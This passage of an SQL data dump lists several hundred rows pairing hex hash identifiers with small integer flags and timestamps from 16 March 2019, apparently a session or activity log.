(70649, '3edf7f21b7cc5b8ae09c985971475555', 'd86d441339858efd', 0, 2, 1, '2019-03-16 08:44:57'),
(70650, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 08:45:31'),
(70651, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 08:45:43'),
(70652, 'a7a9762f5651772601c55ba991df4cf3', '1e09c1b390a7026a', 0, 2, 1, '2019-03-16 08:47:43'),
(70653, '7b69a6ff5cac8298369aa9a01f45bdd8', '8f6009a7f5253d7f', 0, 2, 1, '2019-03-16 08:49:23'),
(70654, '3edf7f21b7cc5b8ae09c985971475555', 'd86d441339858efd', 0, 2, 1, '2019-03-16 08:49:29'),
(70655, '3edf7f21b7cc5b8ae09c985971475555', 'd86d441339858efd', 0, 2, 1, '2019-03-16 08:50:45'),
(70656, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 08:54:12'),
(70657, 'd4b6bde582d6b69ef3005cc8848b2f9b', 'ae74ce852d9ea1d2', 0, 2, 1, '2019-03-16 08:55:59'),
(70658, '04c90f855c3bda06266273e32d7587fc', 'edfe950d47379572', 0, 2, 1, '2019-03-16 08:57:00'),
(70659, 'b665c79401c9499e4984c3bb26a13745', '0315a9e8bb354f60', 0, 2, 1, '2019-03-16 08:58:46'),
(70660, '593241cc7834289915a44c04dec5f10e', '5887c96f315414c4', 0, 2, 1, '2019-03-16 09:04:00'),
(70661, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 09:04:04'),
(70662, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 09:04:34'),
(70663, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 09:04:50'),
(70664, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 09:11:05'),
(70665, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 09:11:27'),
(70666, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 09:11:46'),
(70667, '1834eca10e75a2c9fc8c1a26201076c2', '0611035341fa8332', 0, 2, 1, '2019-03-16 09:11:48'),
(70668, '3edf7f21b7cc5b8ae09c985971475555', 'd86d441339858efd', 0, 2, 1, '2019-03-16 09:12:48'),
(70669, 'c5cadfbe73ab06a0a1fed4eb0f5906b3', '06135eb3f859ee95', 0, 2, 1, '2019-03-16 09:13:04'),
(70670, '3edf7f21b7cc5b8ae09c985971475555', 'd86d441339858efd', 0, 2, 1, '2019-03-16 09:18:10'),
(70671, '8d68bf992872a431de9d649b211a3415', '7501b42c35accff7', 0, 2, 1, '2019-03-16 09:20:27'),
(70672, 'd5bc559bd8ba69d18f6208d11b8e73af', '856a37438ac09705', 0, 2, 1, '2019-03-16 09:22:08'),
(70673, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 09:23:28'),
(70674, '8d68bf992872a431de9d649b211a3415', '7501b42c35accff7', 0, 2, 1, '2019-03-16 09:23:33'),
(70675, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 09:26:47'),
(70676, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 09:28:34'),
(70677, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 09:29:35'),
(70678, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 09:29:41'),
(70679, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 09:29:56'),
(70680, '9d9c80dd3ae9a67df3d5290415a10044', 'f57df3b284792c57', 0, 2, 1, '2019-03-16 09:30:24'),
(70681, '9d9c80dd3ae9a67df3d5290415a10044', 'f57df3b284792c57', 0, 2, 1, '2019-03-16 09:32:16'),
(70682, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 09:33:23'),
(70683, 'b665c79401c9499e4984c3bb26a13745', '0315a9e8bb354f60', 0, 2, 1, '2019-03-16 09:34:40'),
(70684, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-16 09:38:09'),
(70685, '103a7992750035933c2330d84af4c77e', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-16 09:41:57'),
(70686, 'd2a904e022bee257769f4a5e10d9ec52', '2378ec7ca8500d62', 0, 2, 1, '2019-03-16 09:42:00'),
(70687, 'd2a904e022bee257769f4a5e10d9ec52', '2378ec7ca8500d62', 0, 2, 1, '2019-03-16 09:42:16'),
(70688, '9d9c80dd3ae9a67df3d5290415a10044', 'f57df3b284792c57', 0, 2, 1, '2019-03-16 09:45:13'),
(70689, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-16 09:50:50'),
(70690, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 09:52:08'),
(70691, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-16 09:52:10'),
(70692, 'b665c79401c9499e4984c3bb26a13745', '0315a9e8bb354f60', 0, 2, 1, '2019-03-16 09:53:26'),
(70693, 'b6451053f023f5854baf0c7f231926d6', '45557f71f98e1e99', 0, 2, 1, '2019-03-16 09:55:18'),
(70694, '0de5f62cf64653fe483ead08c073883c', 'dcadb578720d99b9', 0, 2, 1, '2019-03-16 09:55:38'),
(70695, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 09:58:21'),
(70696, '0205d2f2021062f5748221a5756698cd', '5cf77fd76ba4dd0a', 0, 2, 1, '2019-03-16 09:58:27'),
(70697, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 09:59:19'),
(70698, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 09:59:26'),
(70699, '0de5f62cf64653fe483ead08c073883c', 'dcadb578720d99b9', 0, 2, 1, '2019-03-16 10:00:31'),
(70700, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 10:00:59'),
(70701, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 10:01:09'),
(70702, '0de5f62cf64653fe483ead08c073883c', 'dcadb578720d99b9', 0, 2, 1, '2019-03-16 10:02:59'),
(70703, 'ddeb7224aa571b2c61cdaad4cb7bb6f6', '8f91df5d347038cf', 0, 2, 1, '2019-03-16 10:04:06'),
(70704, '4430fa30a406991aff7beee7bb23748c', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 10:06:55'),
(70705, '540398793cfd7d29d9b3a0bec70ec9f2', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 10:07:05'),
(70706, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 10:07:43'),
(70707, '4430fa30a406991aff7beee7bb23748c', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 10:07:52'),
(70708, '4430fa30a406991aff7beee7bb23748c', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 10:08:43'),
(70709, '540398793cfd7d29d9b3a0bec70ec9f2', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 10:08:58'),
(70710, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 10:10:23'),
(70711, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 10:10:28'),
(70712, '8d68bf992872a431de9d649b211a3415', '7501b42c35accff7', 0, 2, 1, '2019-03-16 10:11:29'),
(70713, 'd2a904e022bee257769f4a5e10d9ec52', '2378ec7ca8500d62', 0, 2, 1, '2019-03-16 10:14:52'),
(70714, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-16 10:15:59'),
(70715, 'e690414576bc72258769670a0221c3bd', '135f23c8a85974ba', 0, 2, 1, '2019-03-16 10:18:19'),
(70716, '661587016dd893ae00cc5e52eea984b8', '6455f045eb28d63c', 0, 2, 1, '2019-03-16 10:18:19'),
(70717, '8d68bf992872a431de9d649b211a3415', '7501b42c35accff7', 0, 2, 1, '2019-03-16 10:18:26'),
(70718, 'b6451053f023f5854baf0c7f231926d6', '45557f71f98e1e99', 0, 2, 1, '2019-03-16 10:18:34'),
(70719, 'b110f55b891cd37b09f992af5ea55fdc', '407198c79af506a8', 0, 2, 1, '2019-03-16 10:18:38'),
(70720, '8dae012e29f7fdf798f1acb3c6b4b304', '447f0e0c6592a0c2', 0, 2, 1, '2019-03-16 10:18:39'),
(70721, 'b6451053f023f5854baf0c7f231926d6', '45557f71f98e1e99', 0, 2, 1, '2019-03-16 10:18:53'),
(70722, '0de5f62cf64653fe483ead08c073883c', 'dcadb578720d99b9', 0, 2, 1, '2019-03-16 10:18:58'),
(70723, '9008d50571480ccb1c054124479452a8', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:20:19'),
(70724, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 10:20:24'),
(70725, '3136e5351e29f801b9d622a49d7ff60b', '49beede00f1bdad1', 0, 2, 1, '2019-03-16 10:20:32'),
(70726, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-16 10:23:13'),
(70727, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 10:23:48'),
(70728, 'b665c79401c9499e4984c3bb26a13745', '0315a9e8bb354f60', 0, 2, 1, '2019-03-16 10:24:15'),
(70729, '7d35cc48ad190d1880161b9d208486dd', '85f6d12ede9c2a3e', 0, 2, 1, '2019-03-16 10:24:29'),
(70730, '9008d50571480ccb1c054124479452a8', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:24:35'),
(70731, '7d35cc48ad190d1880161b9d208486dd', '85f6d12ede9c2a3e', 0, 2, 1, '2019-03-16 10:24:46'),
(70732, '7d35cc48ad190d1880161b9d208486dd', '85f6d12ede9c2a3e', 0, 2, 1, '2019-03-16 10:25:59'),
(70733, '9008d50571480ccb1c054124479452a8', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:27:05'),
(70734, '9008d50571480ccb1c054124479452a8', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:27:21'),
(70735, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 10:28:24'),
(70736, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 10:28:44'),
(70737, '9008d50571480ccb1c054124479452a8', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:28:52'),
(70738, '99ec3e0c6adcb0a6e4493284b56dd3d3', 'a374ce9fd04078c1', 0, 2, 1, '2019-03-16 10:30:18'),
(70739, '888bdea3ca89602b7cde71a71dc333ed', '7ffba4677245886f', 0, 2, 1, '2019-03-16 10:32:02'),
(70740, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:34:18'),
(70741, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 10:36:31'),
(70742, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-16 10:37:37'),
(70743, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-16 10:37:51'),
(70744, '0f251026ef9e9844e679b7461f5cfd0c', '4a116934babaa4ec', 0, 2, 1, '2019-03-16 10:38:53'),
(70745, '8d68bf992872a431de9d649b211a3415', '7501b42c35accff7', 0, 2, 1, '2019-03-16 10:40:10'),
(70746, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-16 10:40:17'),
(70747, '0f251026ef9e9844e679b7461f5cfd0c', '4a116934babaa4ec', 0, 2, 1, '2019-03-16 10:41:00'),
(70748, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 10:41:44'),
(70749, '0f251026ef9e9844e679b7461f5cfd0c', '4a116934babaa4ec', 0, 2, 1, '2019-03-16 10:42:03'),
(70750, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 10:42:39'),
(70751, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:43:29'),
(70752, '350164f3f90a0fcc87056d88518a26a5', 'b32d89f327a39738', 0, 2, 1, '2019-03-16 10:46:46'),
(70753, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:46:53'),
(70754, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 10:47:44'),
(70755, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:49:47'),
(70756, '610bf051da29ec53ff24944b44ba843d', 'f1cc58f5bed0811c', 0, 2, 1, '2019-03-16 10:50:55'),
(70757, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:51:05'),
(70758, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 10:51:43'),
(70759, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:51:45'),
(70760, '3b9145cf16138b9a4066c8a9c991ef3e', 'df9c5e33f76cc8ea', 0, 2, 1, '2019-03-16 10:52:59'),
(70761, '0f251026ef9e9844e679b7461f5cfd0c', '4a116934babaa4ec', 0, 2, 1, '2019-03-16 10:55:34'),
(70762, '353242147fb5c39d318aba4d3e07d21f', 'fc8570f60f5891f4', 0, 2, 1, '2019-03-16 10:57:34'),
(70763, '8e3d48d4521a48d3f1e436c9c43ec04c', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 10:58:20'),
(70764, '353242147fb5c39d318aba4d3e07d21f', 'fc8570f60f5891f4', 0, 2, 1, '2019-03-16 10:59:03'),
(70765, '353242147fb5c39d318aba4d3e07d21f', 'fc8570f60f5891f4', 0, 2, 1, '2019-03-16 10:59:10'),
(70766, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:59:31'),
(70767, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 10:59:45'),
(70768, '4ca7ac9ad98662b7c6c59e9ed31d04b3', 'f401d121f6f38219', 0, 2, 1, '2019-03-16 11:04:28'),
(70769, '4ca7ac9ad98662b7c6c59e9ed31d04b3', 'f401d121f6f38219', 0, 2, 1, '2019-03-16 11:05:58'),
(70770, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-16 11:06:16'),
(70771, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 11:06:19'),
(70772, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:08:29'),
(70773, '07e6f0fa8a3ebf4869e881e5963258c4', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:08:39'),
(70774, '7708e5b482d8011d341a768ece0f3a6a', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 11:10:32'),
(70775, '7708e5b482d8011d341a768ece0f3a6a', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 11:10:46'),
(70776, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 11:11:37'),
(70777, '4ca7ac9ad98662b7c6c59e9ed31d04b3', 'f401d121f6f38219', 0, 2, 1, '2019-03-16 11:12:14'),
(70778, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:12:27'),
(70779, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:12:34'),
(70780, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:12:43'),
(70781, '4ca7ac9ad98662b7c6c59e9ed31d04b3', 'f401d121f6f38219', 0, 2, 1, '2019-03-16 11:12:59'),
(70782, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 11:13:29'),
(70783, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:13:31'),
(70784, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:14:55'),
(70785, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 11:17:36'),
(70786, 'b6451053f023f5854baf0c7f231926d6', '45557f71f98e1e99', 0, 2, 1, '2019-03-16 11:18:48'),
(70787, '74114c0c2763f97bcb54cc3090fbe0f1', '0c15192004d35e90', 0, 2, 1, '2019-03-16 11:18:53'),
(70788, 'b6451053f023f5854baf0c7f231926d6', '45557f71f98e1e99', 0, 2, 1, '2019-03-16 11:19:13'),
(70789, 'b6451053f023f5854baf0c7f231926d6', '45557f71f98e1e99', 0, 2, 1, '2019-03-16 11:19:23'),
(70790, '03d860e35a8221e055c3a950f24a0306', '09efcb8d7bf145dc', 0, 2, 1, '2019-03-16 11:19:43'),
(70791, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 11:19:52'),
(70792, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 11:20:01'),
(70793, '74114c0c2763f97bcb54cc3090fbe0f1', '0c15192004d35e90', 0, 2, 1, '2019-03-16 11:20:15'),
(70794, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 11:20:15'),
(70795, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 11:20:33'),
(70796, 'cf26a7a17716ad66f0b57ba4da2d2ec8', '6befdcbc3c5586e5', 0, 2, 1, '2019-03-16 11:22:09'),
(70797, '74114c0c2763f97bcb54cc3090fbe0f1', '0c15192004d35e90', 0, 2, 1, '2019-03-16 11:22:24'),
(70798, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 11:24:03'),
(70799, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 11:24:45'),
(70800, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:25:08'),
(70801, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:25:19'),
(70802, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 11:25:33'),
(70803, '610bf051da29ec53ff24944b44ba843d', 'f1cc58f5bed0811c', 0, 2, 1, '2019-03-16 11:26:03'),
(70804, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:26:10'),
(70805, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 11:26:13'),
(70806, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:26:28'),
(70807, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:27:30'),
(70808, '661587016dd893ae00cc5e52eea984b8', '6455f045eb28d63c', 0, 2, 1, '2019-03-16 11:28:24'),
(70809, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 11:28:51'),
(70810, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:28:54'),
(70811, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:29:09'),
(70812, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-16 11:29:41'),
(70813, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 11:30:01'),
(70814, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:30:59'),
(70815, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:31:03'),
(70816, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:31:07'),
(70817, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:31:16'),
(70818, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:31:44'),
(70819, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:31:57'),
(70820, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 11:32:23'),
(70821, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:32:57'),
(70822, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:33:06'),
(70823, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:33:30'),
(70824, '040936a2762a018e19d85fd8e9e1379e', '7ffba4677245886f', 0, 2, 1, '2019-03-16 11:33:50'),
(70825, '9b39f2225fce2ce9503c38195669a971', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:33:56'),
(70826, '3773db0f287a976da1dce694b89f9fc5', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 11:34:34'),
(70827, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-16 11:34:36'),
(70828, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:34:58'),
(70829, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:35:20'),
(70830, '95ed4fde0dfdc75abc546941ff98185f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-16 11:35:36'),
(70831, '3773db0f287a976da1dce694b89f9fc5', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 11:35:44'),
(70832, '3773db0f287a976da1dce694b89f9fc5', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 11:35:55'),
(70833, '3773db0f287a976da1dce694b89f9fc5', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 11:36:06'),
(70834, '3773db0f287a976da1dce694b89f9fc5', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 11:36:20'),
(70835, '3773db0f287a976da1dce694b89f9fc5', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 11:36:31'),
(70836, '3773db0f287a976da1dce694b89f9fc5', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 11:36:43'),
(70837, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:37:02'),
(70838, 'bf0d5d4cb61e70e7a9f03c883e63e46a', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:38:13'),
(70839, 'bf0d5d4cb61e70e7a9f03c883e63e46a', '22f43a16a511f701', 0, 2, 1, '2019-03-16 11:38:22'),
(70840, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:40:56'),
(70841, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:41:17'),
(70842, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:41:39'),
(70843, '773c07942f300cb670fa0d95ccdefd69', 'edfe950d47379572', 0, 2, 1, '2019-03-16 11:41:45'),
(70844, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:42:08'),
(70845, 'a143e22accd91ac51e523578936baf36', '33089a3b34e40302', 0, 2, 1, '2019-03-16 11:43:46'),
(70846, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 11:44:16'),
(70847, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 11:44:53'),
(70848, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 11:45:31'),
(70849, 'e14f5f0ea69c8eddebb03320bd0bad83', '2ce7624136f2bd07', 0, 2, 1, '2019-03-16 11:46:11'),
(70850, '01a50809140fddba529fa6c44f699fbf', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-03-16 11:49:36'),
(70851, 'cf46e8c3641acce82af3d15f263c78ae', '5667acd45e887151', 0, 2, 1, '2019-03-16 11:51:02'),
(70852, '24d4895893f5a3b3110666ba90914d8e', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-16 11:52:18'),
(70853, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 11:52:40'),
(70854, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 11:53:40'),
(70855, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 11:54:05'),
(70856, '11f27e177cf9eb4e354b8823209c6a67', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:55:27'),
(70857, 'ceb2046a286b771871eff3017b202604', '2a976a7b97f7e08b', 0, 2, 1, '2019-03-16 11:58:54'),
(70858, '11f27e177cf9eb4e354b8823209c6a67', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 11:59:06'),
(70859, 'ceb2046a286b771871eff3017b202604', '2a976a7b97f7e08b', 0, 2, 1, '2019-03-16 12:00:07'),
(70860, '01a50809140fddba529fa6c44f699fbf', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-03-16 12:01:00'),
(70861, '997b9d8c64d89294a0e0195714b50ac9', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 12:01:11'),
(70862, '997b9d8c64d89294a0e0195714b50ac9', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 12:01:24'),
(70863, '421548a0b9d8b50e90509115d4d0a3a1', '44451e386b316e7c', 0, 2, 1, '2019-03-16 12:01:39'),
(70864, '01a50809140fddba529fa6c44f699fbf', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-03-16 12:02:36'),
(70865, '691940c681b4523e30ee7c3eab3efc2f', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:03:27'),
(70866, '11f27e177cf9eb4e354b8823209c6a67', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 12:03:30'),
(70867, '691940c681b4523e30ee7c3eab3efc2f', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:04:10'),
(70868, '691940c681b4523e30ee7c3eab3efc2f', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:04:34'),
(70869, '809395234999770601442e46c49d6edf', 'f57df3b284792c57', 0, 2, 1, '2019-03-16 12:05:57'),
(70870, '691940c681b4523e30ee7c3eab3efc2f', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:06:13'),
(70871, '691940c681b4523e30ee7c3eab3efc2f', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:06:29'),
(70872, '691940c681b4523e30ee7c3eab3efc2f', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:06:54'),
(70873, 'dabf2596fb04254f13cd50060adc4c86', '0315a9e8bb354f60', 0, 2, 1, '2019-03-16 12:08:56'),
(70874, '1834eca10e75a2c9fc8c1a26201076c2', '0611035341fa8332', 0, 2, 1, '2019-03-16 12:13:05'),
(70875, 'd0d2c2af552d32ecf67497bec7983488', '7501b42c35accff7', 0, 2, 1, '2019-03-16 12:13:45'),
(70876, 'd0d2c2af552d32ecf67497bec7983488', '7501b42c35accff7', 0, 2, 1, '2019-03-16 12:14:37'),
(70877, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:16:21'),
(70878, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:16:48'),
